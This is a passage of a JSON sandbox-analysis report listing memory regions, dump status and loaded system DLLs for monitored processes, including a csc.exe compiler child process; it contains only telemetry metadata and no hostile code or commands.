"ref_process_dump": { "ref_id": "proc_dump_76", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796091711488, "type": "region", "version": 1 }, "end_va": 8796091777023, "entry_point": 0, "filename": null, "id": "region_509", "name": "private_0x000007ffffec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796091711488, "timestamp": "00:00:42.077", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000510-addr_0x000007ffffed0000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_77", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796091777024, "type": "region", "version": 1 }, "end_va": 8796092366847, "entry_point": 0, "filename": null, "id": "region_510", "name": "private_0x000007ffffed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796091777024, "timestamp": "00:00:42.078", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000511-addr_0x0000000002fa0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_78", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 49938432, "type": "region", "version": 1 }, "end_va": 50003967, "entry_point": 0, "filename": null, "id": "region_511", "name": "private_0x0000000002fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49938432, "timestamp": "00:00:42.721", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000517-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_79", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799627776, "type": "region", "version": 1 }, "end_va": 8791799693311, "entry_point": 0, "filename": null, "id": "region_517", "name": "private_0x000007ff00180000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799627776, "timestamp": "00:00:43.053", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000523-addr_0x00000000230b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_80", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 587923456, "type": "region", "version": 1 }, "end_va": 588972031, "entry_point": 0, "filename": null, "id": "region_523", "name": "private_0x00000000230b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 587923456, "timestamp": "00:00:43.438", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000525-addr_0x000007ff00190000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_81", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799693312, "type": "region", "version": 1 }, "end_va": 8791799758847, "entry_point": 0, "filename": null, "id": "region_525", "name": "private_0x000007ff00190000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799693312, "timestamp": "00:00:43.446", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000526-addr_0x000007fffff6a000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_82", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092407808, "type": "region", "version": 1 }, "end_va": 8796092415999, "entry_point": 0, "filename": null, "id": "region_526", "name": "private_0x000007fffff6a000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092407808, "timestamp": "00:00:43.449", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000533-addr_0x00000000231b0000-size_0x0000000000270000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_83", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2555904, "start_va": 588972032, "type": "region", "version": 1 }, "end_va": 591527935, "entry_point": 0, "filename": null, "id": "region_533", "name": "private_0x00000000231b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 588972032, "timestamp": "00:00:44.290", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000540-addr_0x000007fffff68000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_84", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092399616, "type": "region", "version": 1 }, "end_va": 8796092407807, "entry_point": 0, "filename": null, "id": "region_540", "name": "private_0x000007fffff68000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092399616, "timestamp": "00:00:44.524", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000548-addr_0x000007fffff66000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_85", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092391424, "type": "region", "version": 1 }, "end_va": 8796092399615, "entry_point": 0, "filename": null, "id": "region_548", "name": "private_0x000007fffff66000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092391424, "timestamp": "00:00:55.808", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000549-addr_0x0000000023740000-size_0x0000000000210000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_86", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2162688, "start_va": 594804736, "type": "region", "version": 1 }, "end_va": 596967423, "entry_point": 0, "filename": null, "id": "region_549", "name": "private_0x0000000023740000", "norm_filename": null, "region_type": "private_memory", "start_va": 594804736, "timestamp": "00:00:55.812", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000554-addr_0x00000000233a0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_87", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 591003648, "type": "region", "version": 1 }, "end_va": 591527935, "entry_point": 0, "filename": null, "id": "region_554", "name": "private_0x00000000233a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 591003648, "timestamp": "00:00:59.335", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline\"", "filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\csc.exe", "id": "proc_2", "image_name": "csc.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000557-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_88", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_557", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:00.162", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000558-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_89", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_558", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:00.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4296703, "entry_point": 4194304, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe", "id": "region_559", "name": "csc.exe", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\csc.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:00.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_560", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:00.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_561", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:00.172", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000562-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_90", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_562", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:00.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_563", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:00.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_564", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:00.175", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000565-addr_0x000007fffffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_91", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_565", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:00.176", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000566-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_92", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_566", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:00.177", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_567", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:00.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_568", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:00.195", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000569-addr_0x0000000000150000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_93", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1384447, "entry_point": 0, "filename": null, "id": "region_569", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:00.195", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000570-addr_0x0000000000260000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_94", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 0, "filename": null, "id": "region_570", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:01:00.196", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000571-addr_0x0000000000420000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_95", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_571", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:01:00.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_572", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:00.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_573", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:00.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_574", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:00.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_575", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:00.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1863679, "entry_point": 1441792, "filename": "\\Windows\\System32\\locale.nls", "id": "region_576", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:01:00.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_577", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:01:00.259", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_578", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:01:00.259", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_579", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:00.259", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1966473216, "type": "region", "version": 1 }, "end_va": 1967296511, "entry_point": 1966484976, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_580", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1966473216, "timestamp": "00:01:00.259", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_581", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:00.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_582", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:00.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_583", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:00.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_584", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:00.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2002944, "start_va": 22414360576, "type": "region", "version": 1 }, "end_va": 22416363519, "entry_point": 22414360576, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cscomp.dll", "id": "region_585", "name": "cscomp.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\cscomp.dll", "region_type": "memory_mapped_file", "start_va": 22414360576, "timestamp": "00:01:00.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791555899392, "type": "region", "version": 1 }, "end_va": 8791556354047, "entry_point": 8791555903796, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_586", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791555899392, "timestamp": "00:01:00.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1216512, "start_va": 8791622287360, "type": "region", "version": 1 }, "end_va": 8791623503871, "entry_point": 8791622425960, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll", "id": "region_587", "name": "c2r64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll", "region_type": "memory_mapped_file", "start_va": 8791622287360, "timestamp": "00:01:00.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 8791623532544, "type": "region", "version": 1 }, "end_va": 8791624032255, "entry_point": 8791623675456, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll", "id": "region_588", "name": "appvisvstream64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll", "region_type": "memory_mapped_file", "start_va": 8791623532544, "timestamp": "00:01:00.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2318336, "start_va": 8791624056832, "type": "region", "version": 1 }, "end_va": 8791626375167, "entry_point": 8791625165084, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll", "id": "region_589", "name": "appvisvsubsystems64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll", "region_type": "memory_mapped_file", "start_va": 8791624056832, "timestamp": "00:01:00.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791742414848, "type": "region", "version": 1 }, "end_va": 8791742537727, "entry_point": 8791742419896, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_590", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791742414848, "timestamp": "00:01:00.271", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_591", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:00.271", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_592", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:00.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_593", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:00.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_594", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:00.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_595", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:00.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_596", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:00.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_597", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:00.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" 